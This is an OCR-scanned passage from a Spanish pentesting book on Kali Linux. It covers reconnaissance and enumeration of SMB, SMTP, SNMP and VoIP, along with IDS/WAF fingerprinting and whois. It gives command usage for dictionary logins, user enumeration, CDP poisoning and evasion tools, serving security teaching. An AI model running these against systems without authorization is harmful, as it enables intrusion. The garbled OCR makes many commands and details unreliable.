internet  File  System ).  que  signifiea  “Sistema  de  Archives  Comun  para  Internet1’  es  un  protocolo  de 
red  disenado  para  compartir  archivos,  impresoras,  puertos  serie  y  otms  elementos  entre  nodos  de  una 
red.  Utilizado  principalmente  en  entornos  Windows  y  DOS. 

SMB  funciona  a  traves  de  un  enfoque  eliente-servidor,  donde  un  elierne  reaiiza  peticiones  espedficas 
y  el  servidor  responds  en  consonancia,  Una  seecidn  de)  protocolo  SMB  se  encarga  especificamente 
del  aceeso  a  sistemas  de  archivos,  de  manera  que  los  clientes  pueden  hacer  peticiones  a  un  servidor 
de  archives*  Otras  secciones  del  protocolo  SMB  sc  especializan  en  la  oomunicaciAn  entre  procesos 
(IPC),  El  recurso  de  comunieadon  entre  procesos  (I  PC),  o  ipc$,  es  un  recurso  de  red  com  parti  do 
entre  equipos  que  utilizan  Microsoft  Windows,  Este  recurso  virtual  es  utilizado  para  facilitar  la 
comunicacion  entre  procesos  y  ordenadores  a  traves  de  SMB,  a  meoudo  para  intercambiar  datos 
entre  ordenadores  autenticados* 
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Pentesling  con  Kali 


En  sistemas  basados  cn  UNIX  en  Sugar  de  ulili/ar  SMB  como  tal,  se  usa  Samba,  que  es  una 
reimplementadon  cn  formalo  software  fibre  del  protocolo  SMB/CIFS. 

En  Kali  se  dispone  de  dos  herramientas  d i se ftadas  para  dicho  protocolo,  esias  herramientas  son 
nbtscan  y  AceCheck. 

nbtscan 

Se  trata  de  una  herramienta  basada  en  Hnea  de  comandos,(eomo  easi  lodas  las  herramientas  en  Kali\ 
que  eseanea  una  red  local  o  remota  en  busca  de  servidores  NETBIOS  abiertos,  accion  considerada 
como  el  primer  paso  a  la  hora  de  deseubrir  carpetas  companidas  sin  proteeeion.  Esta  basada  en  la 
funcionalidad  de  la  herramienta  de  Windows  nbtstat ,  pero  opera  en  un  rango  de  direcciones  en  lugar 
de  cenirse  solo  a  una. 

En  base  a  I  o  anterior  no  es  de  extrahar  que  el  fiincionamiento  de  la  herramienta  requiera  exclusi  vamente 
como  parametro  de  entrada,  bien  una  unica  direccion  IP  “ nbtscan  192.168. 1  99  bien  un  rango  de 

direcciones  IP  "nbtscan  -r  1 92 + 168, 1,0/24  \ 

* 

AceCheck 

La  herramienta  AceCheck  se  define  a  si  misma  como  una  herramienta  diseflada  para  intentar 
estableeer  conexidn  con  los  recurs  os  virtuales  I  PCS  y  ADMINS,  v  probar  una  combinacidn  de 
usuarios  y  conirasefias  recibidas  a  traves  de  un  diecionario  previamente  preparado. 

De  rnancra  similar  al  NBTSCAN,  AccChcek  solo  necesita  la  introduccidn  median le  argumentos 
de  la  direccion  IP  a  auditar  o  de  un  archive  con  lodas  las  direcciones  IP  previamente  selecciomdas 
“A ccCheck.pl  -/  10.10. 10. 1 "  si  no  reetbe  como  parametro  opcional  un  listado  de  contrasenas,  con 
el  argumento  iL-P!'  inientara  identificarse  como  administrador  con  contrasena  en  bianco  y  si,  por  el 
contrario,  recibe  un  listado  de  usuarios,  con  el  parametro  ‘-U  '  intentara  identificarse  contra  todos 
el  los. 


SMTP 

SMTP  User  Enumeration 

Uno  de  los  metodos  utilizados  para  probar  y  obtener  nombres  de  usuano  y3  en  definitiva,  sus 
direcciones  de  eorrer,  es  a  traves  dc  las  para  metros  VRFY  y  EXPN.  VRFY,  del  ingles  verify,  es 
requerido  en  el  RFC  821  y  su  principal  objetivo  es  verificar  la  existencia  de  un  usuario  en  un  servidor 
web,  devolviendo  coma  respuesta  el  nombre  asi  como  el  buzon  de  correo  del  mismo. 


Si  d  servidor  acepta  la  peticion,  puede  contestar  con  un  250,  251,  o  252,  dependiendo  de  si  la 
direccidn  es  vilida,  es  reenviada  o  bien  le  es  desconocida.  Un  codigo  550  im plica  que  la  direccion 
no  existe  y  que  el  servidor  rechazard  cualquier  mensaje  para  el. 


Otra  option  para  conseguir  nombres  de  usuarios  locales  sin  hacer  uso  de  VRFY  y  EXPN  es  medianie 
las  cabeceras  RCPT  TO *  Esto  es  debido  a  que  el  servidor  debe  responder  coil  un  codigo  de  control 
a  cada  solicitud  RCPT. 


(  opindo  //.  Recogida  de  information 
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[2n  A \ili  sc  puedc  explotar  esta  tecnica  de  manera  artesanal  con  Netcat ,  o  su  equivalence  NC/1T,  y  eon 
la  iierramienta  smtp-user-enum.  La  primera  requiere  establecer  comunication  el  servidor  de  correo 
matiualmente,  para  ello  sera  necesario  reconocer  previamente  los  servidores  de  la  organizacidn  con 
el  tinsenum  y  el  imap  hasta  averiguar  en  que  servidor  se  encuentra  e!  gestor  de  correo  junto  cor  el 
puerto  y  si  el  trafico  es  normal  o  SSL. 


H^ldre&srs: 


LI  4* 


^ejrrw  Servers 


es 


as 
.  es 


ci 

Sit 


„v  is.es 


ETr,  es 


lail  (M\  Servers: 


.es 


06406  IN 


i! 


*  H 


7335S 

1782 


IN 


bOtMTIr. 


39767  IN 


iR 


tol 


lmagcn  02,23:  Deieccum  del  servidor  dc  correo  con  dmemm. 


Starting  hivnap  6*25  (  http://nmap.org  )  at  2dl  3-04-09  15:35  Her -a  de  verano  romance 
Mmp  scan  report  for  in  *.ts  (1|  1®) 

Host  is  dp  (0.0845  latency)* 

Mot  shwfi;  9B  filtered  ports 
PORT  STATE  SERVICE 
25/tcp  open  smrtp 
587/tcp  open  submission 

l^flP  done:  1  IP  address  (i  host  up)  scanned  in  7.22  seconds 

Imagen  02.24:  DescubrimientO  dd  servtcio  SMTP  con  nmap. 


Una  vez  realizados  los  pasos  anteriores,  la  comunicacion  a  mantener  con  el  servidor  tendra  la 
siguiente  estructura: 

-  neat  (— ssl)  serv  idor  puerto 

A 

-  220  servidor  Banner 

-  HELO 

/ 

*  501  HELO  requires  domain  address  ->  [HELO  x]  |  250  ... 

-  VRFY  \  EXPN  root 

-  502  VRFY  command  is  disabled/Error:  command  not  recognized  |  550  user  unknown  | 
250  root.,*. 

-  MAIL  FROM: root 

-  250  *..ok 

-  RCPT  TOiroot 

-  504  need  fully-qualified  adrres[503  nested  mail  command|550  user  unknown  250  ....ok 
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Pen tes ring  con  Kali 


Como  se  puede  observar  con  un  simple  vistazo  al  anterior  cbdigo  cste  proceso  arroja  nuichos  mens&jes 
de  error  y  de  naiuraleza  muy  variada,  por  ello,  puede  resultar  reoomendable  seguir  el  proceso  a  mano 
al  principio  y  posteriormente*  si  se  ha  encontrado  a  [gun  fallo  que  exp  lota  r,  automatizar  el  proceso 
con  la  herramienta  smtp-user-enum,  Esta  herramienta  permite  especificar  el  metodo  de  consults, 
si  se  quiere  pregunlar  por  el  nombre  de  usuario  o  si,  por  el  contrario,  hay  que  pregimtar  por  hi 
direction  completa  de  correo,  ademas  esta  pensada  para  utilizar  un  diccionario  tanto  de  usuarios 
como  de  direcciones  de  servi  dares  de  correo.  La  estructura  de  los  argument  os  de  entrada  de  la 
herramienta  seria  la  siguiente  *'smtp-mer-enum  -M  fVRFY\EXPN\RCPT}  f-U  users. txt\-u  usuario} 
{ -  T  servidores.  Ixt  J  - 1  senidor}  \ 

p 

Otras  herramientas  multiproposko  como  Medusa  o  Meimploit  implementan  modulos  pensadospara 
poder  explotar  esta  di  recti  va. 

Medusa  es  una  herramienta  pensada  para  hacer  ataques  de  fuerza  bruta  contra  las  interfaces  de 
identification.  Sus  caraeteristicas  clave  destacan  en  su  diseho: 

Disenada  para  irabajar  en  paralelo  recurriendo  al  uso  de  multiples  hilos. 

-  Todos  los  argumentos  de  entrada  pueden  ser  especificados  de  manera  flexible  mediante 
cl  uso  de  dictionaries. 

-  Disefio  modular.  No  requiere  modificationes  en  el  nucleo  de  la  aplicacion  para  extender 
su  funcionam iento .  C’ada  modulo  de  scrvicio  es  independientc  del  resto  y  se  encuentra 
definido  en  un  archivo  .mad, 

En  concrete,  el  modulo  de  medusa  encargado  de  la  enumeracifin  dc  usuarios  en  servidores  SMTP 
se  llama  smtp-vrfy  (el  resto  de  modulos  pueden  ser  enumerados  mediante  el  argumento  ‘W  y  para 
acceder  a  la  ayuda  de  cada  modulo  hay  que  especificar  el  nombre  del  modulo  eliminado  la  extension 
y  pasarle  cl  argumento  ”)*  los  argumentos  que  requiere  para  su  funcionam  iento  son: 

-  -M  smtp-wfy:  Indica  a  medusa  que  cl  modulo  a  ej  ecu  tar  se  trala  del  encargado  de  enumerar 
cuentas  de  usuario  mediante  el  metodo  SMTP  VRFY  (se  echa  en  falta  la  existencia  de  algun 
modulo  que  permita  las  otras  dos  optiones), 

-  -m  EHLO:mensaje:  Paramelro  optional  a  anadir  en  el  saludo  initial  muchos  servidores 
requieren  que  se  indique  algo. 

-  -U  cuemas.txt:  Como  el  propio  parametro  indica  se  trata  del  listado  de  usuarios  a 
comproban 

-  -p  dominia:  Del  mismo  modo,  en  este  punto  se  especifica  el  dominie  a  atacar, 

hoi  su  parte,  Metasplait,  herramienta  que  sera  anahzada  en  profimdidad  en  capitulos  posteriores, 
en  el  modulo  au x il i ar  auxilkuy/$canner/smtp/sm(p_envm  es  eapaz  dc  emplear  los  metodos  VRFY 
>  LXPN  {tampoco  soporta  el  metodo  RCPT),  para  conseguir  enumerar  los  nombres  de  usuario. 
Unicamente,  al  igual  que  en  el  case  de  medusa,  requiere  que  se  le  especifiquc  cl  diccionario  y  el 
MTA/MFAs,  con  ello  seria  suficiente  para  empezar  cl  ataque  de  fuerza  bruta  sobre  ti  servidor  de 

COITCO, 
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SWAKS 

]SJo  sc  puede  term  mar  un  apartado  sobre  rccopilacion  de  inform  acidn  en  SMTP  sin  nombrar  la 
herramienta  SWAKS  (Swiss  Army  Knife  for  SMTP),  que  como  su  nombre  indiea  se  trata  de  “1  a 
N.ivaja  Suiza  Para  SMTF\  Se  trata  de  una  herramienta  multiusos,  flexible,  pensada  para  $er  utilizada 
en  scripts,  y  esta  orienlada  a  probar  transace  iones  SMTP- 

gsta  hermmierita  permite  automatizar  el  proceso  de  comunicacibn  con  los  servidores  de  eorreo 
para  comprobar  el  comportamiento  de  estos  ante  cada  tipo  de  pet ic ion  y  determ  inar  ante  que 
ciramstandas  el  servidor  se  encuentra  mal  configurado  o  conseguir  generar  un  mensaje  de  eorreo 
que  no  sea  tratado  como  spam.  Por  ejemplo,  en  determinadas  ocas  ion  es  sera  necesario  espeeificar 
direceiones  de  envio  y  de  destine  validas,  en  otras  ademas  requerira  credenciales  validos,  que  en 
la  cabecera  de  EHLO  se  halle  un  mensaje.  que  el  euerpo  del  mensaje  no  tenga  un  determinado 
formate,  etcetera.  Hay  que  considerar  el  hecho  por  el  cual  si,  con  el  mensaje  por  defecto,  no  surge 
ningun  error  cn  el  envio  y  el  mensaje  es  considcrado  como  positive,  el  servidor  sc  podria  considerar 
altamente  vulnerable  a  ataques  dirigidos  mediante  spam , 


Por  ejemplo,  en  muchos  eorreo  s  corporativos  el  mensaje  que  genera  por  defecto  la  herramienta 
al  recihir  los  siguientes  argument  os:  server  servidor  — hell  o~  mensaje  -io  ties  imat  aria  —from 
remitente,\  es  automaticamente  rechazado  mostrando  como  error  el  eodigo  550  (en  caso  de  ser 
descstimado  por  el  motor  do  iiltro  de  contenido).  Fambien  puede  generar  entre  otros  el  eddigo  45 1 . 
que  indiea  que  el  mensaje  ha  tdo  a  parar  al  "gray  list”.  Sin  embargo,  Gmail  y  otros  servicios  lo 
aceptan  y  posteriormente  lo  envian  a  la  carpeta  de  spam.  Teniendo  esto  en  mente  podria  ser  posible 
esludiar  cl  comportamiento  de  los  servicios  que  lo  aceptan,  estudiar  el  mensaje  de  alarma  o  free  i  do 
y  modi  Hear  el  mensaje  en  consonant:  ias  evitando  asi  utilizar  ciertas  palabras  clave  o  estudiando  quo 
tipos  de  vmculos  despiertan  la  alarma  del  gestor. 


rout  ©Jra-tti  o 

ivo  Edita  Vvi  U<jv.  jr  TennirvW  f  uri.i 


-hflilo=u»  «s  --to  aal 


s'rtflit s  --server  gmail  -sm tp-in,  1 . goagl e  .ca» 

-•  m  ft  v8g"»aiT  ,f  pm  -  -  f  rotn  109OTMK  >  qf'iQB.es 

-  !  r^lrg  g7<aJ.l  stitft  in .  l . .google  .com  :25  .  . , 

==  Connected  to  gnail-smtp-Ln.l  .getog  E.tum . 

-  220  nx  .googla  .cor  E-BMP  klsiIS541584wic  .4B  -  gsmtp 
->  £-H[  0  uc^ni  .es 

250 -ffiK. goagl s  .  ccari  at  your  service,  :?13 .97.707.421 

-  25B -SIZE  3 508 25 77 
253~asrmif€ 

■c  250  -  START  TLS 

<-  750  ENHANCEDSTJITilSCODfS 

->  HAIL  E-HDM  : IM  ■  R  f?.CS> 

<  250  2.1.0  OK  klsi5541504wic.'18  -  gs^tp 

->  RGPT  .tom> 

250  2.1.5  OK  kl5l654i504n’Lc  .48  -  gajutp 

>  DATA 

*-  354  Co  Ahead  kln654lS04wic.  .40  ■  gsmtp 

-*  Date:  frl*  Ob  Apr  2813  08:16:06  *0700 

■>  To:  da i  _ 

-*  From;  ■> 

->  Subject :  til 

>  X -Mailer:  *wa k»  v2Q't 28320.0  )ot®ore4org/jo^in/eofJo/*w«k*/ 

| 

■  >  Thin  i*  a  i.pi1  m tilling 


250  2.0.0  OK  13655 2 1502  kl *1054 1584 wit  . 40  -  gsmtp 
->  QUIT 

-  ?71  7  .0,0  t os  I  '  .g  tormection  k  1e15541584w1.c  ,  40  -  gsmtp 

==  Connection  closed  witri  romolrB  hg?t . _ _ 

Imogen  02.25:  Ejemplo  del  uso  de  la  herramienUi  snvaks. 
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test  Fit  05  Apr  2013  08  1 6:06  +0200 


5  abr  (hac#  4  cNaa] 


par*  m  > 


A  iPw  *st«  fiitnuj#  w  *ncL»mrt  oil  to  carped  Spurn?  Parqu*  es  sirritlw  a  lot  hwii^ii  qu*  hwt  dictate  Jo*  Mm*  de 
spam  Mss  intorinactfri 

This  Ja  a  teat  mating 


H az  ctic  iw-tji  para  Re-scc-ndej  o  fteeimai 


Imagen  02,26:  Meqsajc  dt1  spam  en  Gmail. 


SNMP 


t]  protocolo  SNMP  (Simple  Network  Management  Protocol ),  que  signifies  "Pro toco lo  Simple 
de  Administration  de  Red”,  aunque  despectivamente  en  ei  mundo  de  la  seguridad  tambien  sea 


conocido  con  el  sobrenombre  de  ‘‘Security  is  Not  My  Problem”,  es  un  protocolo  disenado  para 
lacilitar  el  intercambio  de  infonnacidn  de  administracion  entre  dispositivos  de  red.  Permite  a  los 
administradores  monitorizar  el  luncionamiento  de  la  red,  buscar  y  resolver  incideneias,  gestionarsu 
crectmiento,  etcetera 


Las  versionos  de  SNMP  mas  implantadas  son  SNMP  version  l  (SNMPvl)  y  SNMP  version  2 
($NMPv2)  que  basan  toda  su  seguridad  en  una  simple  palabra  conocida como  nornbre  de  cornu ni dad, 
De  ahl  que  la  ultima  version  SNMPv3  posea  cambios  signilicativos  con  relacion  a  sus  predece sores, 
sobre  todo  en  aspectos  de  seguridad. 


SNMPCHECK 

Kaii  dispone  de  la  herramienta  snmpcheck,  disenada  para  enumerar  toda  la  informacion  de 
administracion  de  red  una  vez  que  ha  sido  identificada  la  direccidn  IP  con  el  argumento  ”  y  el 
Puerto  con  el  argumento  “-p  en  el  cual  esta  disponible  el  servicio.  Como  argumentos  opctonales 
se  encuentra  la  posibdidad  de  especifiear  un  nombre  de  comunidad  con  el  argumento  4  -c  ",  o  por  el 
contrario  utilizar  la  opcion  public "  y  la  version  del  protocolo  usada,  con  el  argumento 


i.” 

-v  , 


Teenologia  VoIP 

A1  conjunto  de  protocolos  que  se  usan  para  enviar  senales  de  voz  sobre  la  red  IP  se  conoce  como 
Protocols  de  Voz  sobre  IP  o  "protocolos  IP”.  VoJP  hacc  referenda  al  conjunto  de  nomxas, 

dispositivos  y  protocolos,  (es  decir,  a  la  tecnologfa  necesaria)  que  permiten  comunicar  la  voz  sobre 
el  protocolo  IP, 

In  Vo  I R  el  cliente  establccc  y  origina  las  llamadas,  el  sonido  recibido  a  traves  del  mierdfono  del 
usuario  se  codifica,  se  empaqueta  y,  al  llegar  ul  destine,  sufre  cl  proceso  inverse  para  reproducirse  a 
traves  dc  los  audifonos  del  otro  usuario.  Un  ejemplo  de  esto  serian  los  usuarios  de  Skype  y  simi lares. 
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Pn  esta  tecnologia,  y  como  en  otras  tantas,  los  servidores  se  encargan  de  gestionar  las  operaciones 
Jc  base  de  dates.  Las  operaciones  mas  comunes  llevadas  a  cabo  son  la  contabilidad,  la  recoleccion, 
el  cnnitamiento,  la  admmistraciin,  el  control  del  servicio,  la  gestion  de  usuarios,  etcetera. 

Los  gateway's  tienen  como  fimeion  principal  proveer  de  interfaces  compatibles  con  la  telefonla 
tradicionaL  la  etial  se  comportara  como  una  plalaforma para  los  usuarios  virtuales.  Estos  dispositi vos 
son  los  encargados  de  terminar  el  enlace  de  la  llamada,  es  decir,  los  clientes  originan  las  Ihimadas  y 
los  gateways  se  encargan  de  conectarlos  al  tel6fono  fijo  o  movil  deseado. 

La  mayor  ventaja  de  esta  tecnologia,  que  ha  facilitado  su  amplia  di  fusion  en  las  organizaciones, 
es  el  ahorro  de  cosies  que  supone,  ast  como  su  alta  flexibilidad.  Sin  embargo  esta  tecnologia  es 
susceptible  los  mismos  problemas  que  tiene  el  protocolo  IP,  entre  los  que  se  pueden  encontrar  el 
registro  del  trafico,  (en  estc  caso  de  las  conversaciones),  la  denegacion  de  servicio,  la  suplantacion 
de  la  identidad  de  uno  de  los  usuarios,  etcetera 

En  Kali  la  mayoria  de  las  herramientas  de  auditoria  de  VoIP  se  encuentran  en  la  categoria  de  “h 
herramientas  VoLP  disenadas  para  h usmear/en vene nar  ' ,  no  aparece  directamente  la  suite  SIP  Vicious, 
jxto  si  muchas  de  sus  herramientas.  Las  herramientas  que  Kali  considera  orientadas  a  la  recoleccion 
d  informacion  en  VoIP  que  actualmente  proves  son  AC  E  y  enumlAX.  Adem&s  otro  enfoque  a  mitad 
de  camino  emre  la  recoleccion  de  informacion  y  la  intrusion  en  Jos  stslemas  vendrta  dado  por  dos  de 
las  herramientas  incluidas  en  la  suite  SIP  Vicious,  svmap  y  svwar. 

ACE  VOIP 

AC  E  VOIP,  del  ingles  Automated  Corporated Enumerator,  que  significa  himumerador  corporativo 
automatixado1',  se  trala  de  una  simple,  pero  no  menos  poderosa  herramienta  de  enumeracion  de 
directories  VoIP  corporativos,  disenada  para  imitar  el  comportamiento  de  un  telefono  IP  para 
descargar  las  entradas  de  nombre  y  extension  que  un  determinado  telefono  podria  niostrar  en  la 
pantalla  de  su  interfaz.  La  herramienta  ha  sido  disehada  con  la  idea  de  que  los  futures  ataques  sean 
llevados  a  cabo  contra  los  usuarios  basados  en  sus  nornbres,  en  lugar  de  trabajar  directamente  sobre 
cl  stream  de  audio  o  sobre  las  direcciones  IP.  ACE  trabaja  usando  DHCP,  TF TP,  v  HTTP  de  cara  a 
cumplir  la  tarea  de  enumeracion  anterionnente  mencionada. 

4 

ACE  actualmente  soporta  la  enumeracion  del  directorio  corporative  utilizado  en  los  teiefonos  IP 
Cisco  Unified  El  fun  cion  ami  ento  seda  similar  al  siguiente; 

Envenena  el  CDP  para  conseguir  el  VVID. 

-  Anade  la  interfaz  VLAN  de  Voz  (a  parti r  de  ahi  todo  el  trafico  estara  marcado  con  el 
VVID). 

-  Envta  petlciones  DHCP  marcadas  con  el  VVID, 

Decod  ifica  las  direcciones  IP  del  servidor  TFTP  gracias  a  la  opeion  DHCP  1 50, 

Envia  una  peticidn  TFTP  al  archive  dc  configuracidn  del  telefono  IP. 

Parsea  e!  archive,  aprendiendo  el  directorio  corporative  de  direcciones  URL. 

Envia  peticiones  GET  HTTP  al  directorio. 
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-  Parsea  los  datos  XML,  escribiendo  el  director io  de  usuario  en  un  archive  formatesdo  en 

texto  piano,  1 

HI  planteamiento  de  ACE  le  permite  trabajar  de  das  formas  diferentes*  Puede  descubrir 
automaticamente  la  direccidn  IP  del  servidor  TFTP  via  DHCP,  o  se  le  puede  especificar  dicho 
parametro  eomo  argumento  de  la  herramienta  en  Hnea  de  comandos, 

Se  Va  a  presentar  a  conti nuacidn  un  ejemplo  de  los  dos  metodos  bdsieos  de  funcionamiento. 

Modo  de  descubrimiento  aulomaiico:  "ace  -i  ethO  -  m  00:  IE:F7:28:9C:SE  ’El  argumento 
“-i,?  identifxca  la  interfaz  de  eseucha  y  el  argumento  “-nrT  la  MAC  del  dispositive  a  suplantar, 
Ainbos  son  parametros  obligados  para  la  ejecucion  de  la  herramienta. 

-  Modo  especifico:  “ace  -i  ethO  -t  192.168,10,150  -m  0Q:1E:F7:28:9C:8E"  Ademas  de 
los  anteriores  argumentos,  se  utiliza  el  argumento  “-t”  para  especificar  la  direccidn  TP  del 
servidor  TFTP, 


El  resto  de  argumentos  opcionales  habilitados  para  la  herramienta  son  los  siguientes: 

M-t  [0-1]  ':  Argumento  binario  que  determina  et  comportamiento  en  modo  monitor  (0)  o 
en  modo  envenenador  \  1 ). 

'*-v  VLAN  ID Argumento  que  permite  especificar  el  identificador  de!  VLAN, 
i4-r  interfaz Elimina  la  interfaz  VLAN. 

f,-v Como  en  otras  tantas  herraraientas,  habilita  el  modo  detallado  o  de  depuration. 

enumlAX 

Dd  mismo  modo  que  ACE  esta  pensada  para  realizar  la  enumeraeidn  del  direclorio  corporativo 
suplantando  telefonos  Cisco  Unified,  enumlAX  se  trata  de  un  enumerador  por  fuerza  bruta  de 
usuarios  a  traves  del  protocol o  IAX2%  {Inter  Asterisk  Exchange  vers i no 2).. 


enumlAX  es  capaz  de  realizar  ataques  de  fuerza  bruta  bien  basdndose  en  un  diccionario  de  nombres 
de  usuario  comunes  o  deducido  a  traves  de  ingenieria  social,  o  bien  de  manera  secueneial  Este 
ultimo  utiliza  los  earacteres  ddinidos  en  el  archivo  charm ap.h,  por  defecto  se  trata  dd  range 
alfanumerico.  es  decir,  las  letras  de  la  “a”  a  la  “z?"  y  los  mimeros  del  “O  '  al  “9”.  El  funcionamicnto 
de  esta  herramienta,  al  igual  que  en  cl  easo  de  la  herramienta  anterior,  es  muy  sencillo; 

*  Modo  secueneial:  Enumiax  direct  ion  ip  oh jetiva  -m  4  -M  8  -v  eomo  se  puede  intuir,  el 
primer  argumento  a  pasar  corresponde  a  la  direccidn  IP  del  servidor  I  AX,  el  segundo,  an  J\  a  la 
longitud  minima  del  nombrede  usuario,  el  tercero,  n-M'\ a  la  longitud  maxima  y  el  euarto, 
eomo  ya  se  coment6  anteriormente,  a  I  modo  detallado  (este  parametro  puede  repetirse  varias 
veces  para  incrementar  el  nivel  de  detal le  de  la  salida  de  la  herramienta). 

*  Mode  diccionario:  “enumiax  direccidn  ip  objetivo  -d  diet  -v”,  en  esle  caso  tamhjdn  existen 
otros  parametros  adicionales  que  pueden  resultar  de  utilidad: 


C 'ap i tulo  Recogkla  de  in/ormaci on 


[0-9]+ M:  Permile  indicarle  a  la  herramienta  el  nuraero  de  iteraciones  que  debe  hacer 
antes  de  guardar  el  estado  de  la  sesidn.  Por  defeeto,  si  no  se  le  indica  lo  contrario,  trabajari 
eon  el  valor  1 000. 

"-s  nombre  archivo Recupera  el  estado  de  una  sesion  anterior. 

Svmap 

Svmap  cs  on  esciner  de  red  para  SIP.  De  comportamiento  similar  a  Nmap ,  escanea  la  red  buscando 
dispositivos  y  puertos  especificos  en  base  a  los  argumentos  pasados  por  linea  de  comandos,  Una 
vez  que  svmap  encuentra  un  dispositivo  que  soporte  SIR  extraera  la  infonnacion  de  la  respuesta  e 
identificara  el  tipo  de  dispositivo.  La  salida  habitual  del  program  a  genera  un  lisiado  de  directories 
IP  Je  dispositivos  SIP  y  el  nombre  de  los  mismos. 


Svmap  tunciona  enviando  un  paquete  uDP  que  conti ene  una  peticion  SI P  a  un  determinado  rango  de 
direcciones  IP especificado  por  el  usuario.  y  a  continuacion  lista  aquellas  respuesias  SIP  validas.  Este 
luncionamiento  en  teoria  lo  haee  mucho  mas  rentable  que  usar  Nmap  para  los  mismos  propositos 
(segun  el  blog  del  autor  se  presupone  unas  seis  voces  mas  rapido). 


I  os  argumentos  Msicos  que  necesita  svmap  para  funcionar  son  una  direccion  IP  que  determine  el 
tango  de  coraienzo  y  otra  direccion  IP  que  lo  acabe  "svmap  ip  I -ip  2  \  En  la  Wiki  de  SIP  Vicious  se 
puede  obtener  un  listado  complete  de  todas  las  opcioncs,  siendo  las  mas  mteresanies  los  argumentos 
”‘P "  que  permite  especificar  varies  puertos  a  incluao  un  rango  y  la  option  "-q  "  que  aettva  la  option 

de  sigilo. 


Svwar 

Svwar,  como  anteriormente  ha  sido  comentado,  se  trata  de  otra  dt  las  herramtentas  de  suite 
SlPVicious.  Esta  herramienta  esta  discrmda  para  obtener  los  usuarios  dc  una  PBX  o  servidor  VoIP 

LI  tunciona  mien  to  de  esta  herramienta  esta  basado  en  la  idemifkacion  de  las  extensions  validas 
preguntando  por  una  seric  de  numeros  por  defecto  situados  en  los  siguienies  rangos: 

B  -  Desde  1 000  aumentado  en  1000  hasta  llegar  a  9000. 

-  desde  1 001  aumentado  en  1000  hasta  llegar  a  9001  + 

-  desde  1111  aumentando  en  1111  hasta  llegar  a  9999. 

-  desde  Hill  aumentando  en  11111  hasta  llegar  a  99999. 
desde  100  a  999  de  un  en  uno. 

~  desde  1234,  2345  hasta  7890. 


ttioualmenle  y  para  evitar  errores  Smar  envia  una  respuesta  ACK  a  las  respuestas  SIP  cor 
c°dign  200  debido  a)  comportamiento  de  varies  PBX  que  conti  nuan  enviado  paquetes  a  la  espera  dt 
-  l^ir  dicha  confirmation. 
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El  funcionamiento  de  Svwar  es  tan  sencillo  corao  el  de  la  herramienta  predecesora.  una  vez  que 
se  obtiene  una  direccion  IP  valida,  hast  a  con  ejecutar  la  herramienta  pasandole  exclusivamente  la 
direccion  IP  del  objetivo  “svwar  direccion  IP",  Aunquc  corao  era  de  esperar  tambien  es  posible 
especificar  un  determinado  range  o  incluso  utilizar  un  diccionario,  La  primera  ope  ion  sc  realiza  a 
traves  del  argumento  "~e  "  y  la  segunda  con  el  argumento  -d' 

IDS/IPS 

Los  IDS  {Intrusion  Detection  System),  que  significa  “Sislema  de  detcccion  de  Intrusos"  son 
herramientas,  generatmente  basadas  en  hardware  para  evitar  perdida  en  el  rendimiento  de  la  red. 
disenadas  para  detectar  acccsos  no  autorizados  a  un  ordenador  o  red. 

Por  su  pane,  los  I  PS  (Intrusion  Prevention  System),  que  obviamente  significa  “Sistcma  de  prevention 
de  Intrusos",  son  considerados  por  algunos  como  una  extension  de  los  IDS,  y  son  en  realidad  otro 
tipo  de  control  de  acceso,  mas  cercano  a  las  tecnologias  de  cortafuegos, 

Los  IDS  basan  su  funcionamiento  en  heuristics  y  patrones.  mientras  que  los  IPS  lo  basan  en  firmas. 
politicas  de  seguridad.  anotnalias  y  HoneyPot. 

Kali  incorpora  ires  herramientas.  ya  mencionadas  anteriorraente,  fragroute,  fragrouter  y  wafwttof 
que  en  combination  con  hpingi  son  ca paces  de  detectar  la  existencia  de  IDS/IPS  y  estudiar  su 
comporiamiento. 

Fragroute/Fragrouter 

Las  herramientas  fragroute  y  fragrouter  estan  disenadas  para  interceptar,  modificai  y  reescribii  el 
trafico  de  salida  con  destino  a  un  determinado  host,  Jmplementan  la  mayoria  de  los  ataques  descritos 
en  el  paper  Secure  Networks “ Insertion ,  Evasion,  and  Denial  of  Service:  Eluding  Network  Intrusion 
Detection"  publicado  en  enero  de  1998, 

Varias  de  las  aplicaciones  practicas  de  la  herramienta  podrian  ser  las  siguientes; 

-  Probar  el  tiempo  11m ite  y  reensamblado  de  parametros  en  los  IDS  de  red. 

Depurar  paquetes  TCP/IP. 

-  Probar  la  earaeterlstica  “state  full”  de  un  determinado  firewall. 

-  F.vadir  tdcnicas  de  detcccion  de  fingerprinting  pasivo  de  S.O. 

W  A  FWOOF 

La  herramienta  WAFWOQF esta  disefiada  para  reali/ar  la  identification  y. fingerprinting  de  productos 
WAF  encargados  de  protegor  paginas  web.  En  eoncreto  la  herramienta,  hoy  en  dia.  es  capaz  de 
detectar  hasta  22  tipos  distintos  de  cortafuegos  web. 

El  funcionamiento  de  la  herramienta  linicamentc  exige  el  paso  como  parametro  de  la  direccion  web 
a  audita r.  y  tras  realizar  todas  las  pruebas  pertinentes  ol record  como  respucsla  el  WAI  quo  estima  se 
encucntra  al  otro  lado. 
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Passive  Footprinting 

protocolo  Whois 

Whois  cs  un  protocolo  R'P  basado  en  peticion/respuesta  utilizado  para  cfcciuar  consultas  a  una  base 
de  datos  permitiendo  determinar  el  propietario  de  un  nombre  de  dominio  o  direccion  IP  publiea. 
Tradicionalmente  dieha.s  consultas  han  side  realizadas  a  traves  de  la  Interfax  de  linea  de  comandos, 
sin  embargo  actualmente  existen  multitud  de  paginas  web  disenadas  para  reaiizar  estas  consultas. 


WHOiS  information  for 


[Query rig  rvhra.veii&gi-grs.axn] 
{Redirected  to  whois.  mdbflumat  com] 
[Querying  w^TDis.meljixinTeitcom] 
[whois ,  melbourneit ,  com] 

Domain  Name..,* . 

C/ea ban  Date  .  199  5 -Q 1-10 

Registration  Date, ...  201 1-08 - 3 1 


Expiry  Date..........  20 15-01- 10 

Organisation  Name,, .  UiM  of  America  Inc. 
Organisation  Address.  jfev  :  ME 

Organisation  Address. 

Qrgarwsdtjon  Address. 

Of gam-jafton  Addr«&  Rtdmond 
Organza  bon  Address.  98052 
Orgarirtflltan  Address.  WA 
Organtsattofi  Address,  UNITED  STATES 

Admin  Name . * . Web  Master 

Admn  Address... . Afe  p  reNE 

Admri  Addrm, 

Admin  Address,,....., 

Admm  Address.  Redmond 

Admin  Address . W 2 

A  inn  Address, . WA 

Adrnn  Address, ... _  UNITED  STATES 

Aintn  Ernat . .  webmaster  %  .  a.  com 

Admin  Phone,,.,, . „  +4C_  v  *J4Q 

Admin  Fax.. . Al  585 

